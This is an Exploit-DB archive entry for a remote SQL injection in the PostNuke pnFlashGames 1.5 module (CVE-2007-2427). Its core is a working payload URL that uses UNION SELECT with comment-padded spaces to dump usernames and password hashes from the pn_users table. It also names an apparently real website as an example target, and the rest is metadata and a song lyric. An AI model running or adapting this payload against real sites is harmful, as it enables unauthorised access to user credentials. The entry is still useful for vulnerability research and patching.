PostNuke pnFlashGames Module 1.5 - Remote SQL Injection Vulnerability

2007-04-28T00:00:00
ID EDB-ID:3813
Type exploitdb
Reporter Mehmet Ince
Modified 2007-04-28T00:00:00

Description

PostNuke pnFlashGames Module 1.5 Remote SQL Injection Vulnerability. CVE-2007-2427. Webapps exploit for php platform

                                        
                                            ============================================================

PostNuke pnFlashGames Module v1.5 REmote SQL Injection 

============================================================

Bulan: xoron


xoron.biz

+

Love's the funeral of hearts

The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you

:(

============================================================

Exploit: 
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*

============================================================

Example: http://andersonvision.com/PostNuke/
============================================================

# milw0rm.com [2007-04-28]